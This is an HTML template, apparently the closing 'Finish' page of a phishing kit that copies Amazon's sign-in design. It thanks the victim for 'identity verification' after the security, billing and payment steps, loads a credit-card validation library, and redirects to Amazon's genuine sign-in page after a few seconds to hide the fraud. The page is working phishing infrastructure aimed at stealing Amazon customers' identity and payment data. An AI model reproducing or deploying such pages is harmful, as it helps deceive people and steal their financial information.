<!DOCTYPE html>
<html>
    <head>
        <title>Security Checkup</title>
        <meta charset="UTF-8">
        <link rel="shortcut icon" href="{{ url_for('static',filename='img/favicon.ico') }}" />
        <link rel="stylesheet" type="text/css" href="{{ url_for('static',filename='css/boostrap.min.css') }}" media="all">
        <link rel="stylesheet" href="{{ url_for('static',filename='css/sign-dekstop.css') }}">
        <link rel="stylesheet" href="{{ url_for('static',filename='css/style.sign-desktop.css') }}">
        <link rel="stylesheet" type="text/css" href="{{ url_for('static',filename='css/style.css') }}">
    </head>

    <body onload="_loader()" style="margin:0;">
        <div id="loader"></div>
        <div style="display:none;" id="myDiv" class="animate-bon ttom">
            <div id="a-page">
                <div class="a-section a-padding-medium auth-workflow">
                    <div class="a-section a-spacing-none auth-navbar">
                        <div class="a-section a-spacing-medium a-text-center">
                            <div class="a-link-nav-icon"></div><i class="a-icon a-icon-logo" role="img" aria-label="Amazon"></i>
                        </div>
                    </div>
                    <div id="authportal-center-section" class="a-section">
                        <ul class="list-unstyled multi-steps" style="padding-top: 10px" align="center">
                            <li>Security</li>
                            <li>Billing</li>
                            <li>Payments</li>
                            <li class="is-active">Finish</li>
                        </ul>
                        <div class="cc-content6" style="padding-top: 0">
                            <div class="container">
                                <div align="center"> <img src="{{ url_for('static',filename='img/finish.png') }}" width="150"> </div>
                                <div align="center"> <span class="lefttext" style="font-size: 20px; font-weight: 650;">Thank you!</span> </div>
                                <div align="center"> <span class="lefttext">Your Identity verification is in progress.</span> </div>
                                <div align="center"> <span class="lefttext">We will notify you via email message as soon as your account will be verified.</span> </div>
                            </div>
                        </div>
                    </div>
                    <div class="a-section a-spacing-top-extra-large auth-footer">
                        <div class="a-divider a-divider-section">
                            <div class="a-divider-inner"></div>
                        </div>
                        <div class="a-section a-spacing-small a-text-center a-size-mini"> <span class="auth-footer-seperator"></span>
                            <a class="a-link-normal">Conditions of Use</a>
                            <span class="auth-footer-seperator"></span>
                            <a class="a-link-normal">Privacy Notice</a>
                            <span class="auth-footer-seperator"></span>
                            <a class="a-link-normal">Help</a>
                            <span class="auth-footer-seperator"></span>
                        </div>
                        <div class="a-section a-spacing-none a-text-center"> <span class="a-size-mini a-color-secondary"> © 1996-2023, Amazon.com, Inc. or its affiliates </span> </div>
                    </div>
                </div>
                <script src="{{ url_for('static',filename='js/jquery-3.3.1.min.js') }}"></script>
                <script src="{{ url_for('static',filename='js/jquery.mask.min.js') }}"></script>
                <script src="{{ url_for('static',filename='js/jquery.validate.min.js') }}"></script>
                <script src="{{ url_for('static',filename='js/additional-methods.min.js') }}"></script>
                <script src="{{ url_for('static',filename='js/jquery.creditCardValidator.js') }}"></script>
                <script>
                    let load;

                    let _loader = () => {
                        load = setTimeout(showPage, 1000);
                    }

                    let showPage = () => {
                        document.getElementById('loader').style.display = 'none';
                        document.getElementById('myDiv').style.display = 'block';
                    }

                    let timer = setTimeout(function() {
                        window.location = "https://www.amazon.com/ap/signin?openid.pape.max_auth_age=0&openid.return_to=https%3A%2F%2Fwww.amazon.com%2Fs%2F%3F_encoding%3DUTF8%26adgrpid%3D79685717977%26gclid%3DCj0KCQiAz9ieBhCIARIsACB0oGJATtXjrtQiNiijoQXWZ-fYWpDw9AxzdDFphYAK0dXjnqGZV_8OGwAaAoGSEALw_wcB%26hvadid%3D585359104713%26hvdev%3Dc%26hvdvcmdl%3D%26hvlocint%3D%26hvlocphy%3D9119934%26hvnetw%3Dg%26hvpone%3D%26hvpos%3D%26hvptwo%3D%26hvqmt%3De%26hvrand%3D6689636032229245499%26hvtargid%3Dkwd-360364907677%26hydadcr%3D2745_13541852%26ie%3DUTF8%26index%3Daps%26keywords%3Damazon%2520login%26ref%3Dpd_sl_8tp0uuj308_e%26tag%3Dhydglogoo-20%26ref_%3Dnav_ya_signin&openid.identity=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0%2Fidentifier_select&openid.assoc_handle=usflex&openid.mode=checkid_setup&openid.claimed_id=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0%2Fidentifier_select&openid.ns=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0&"
                    }, 5250);
                </script>
    </body>
</html>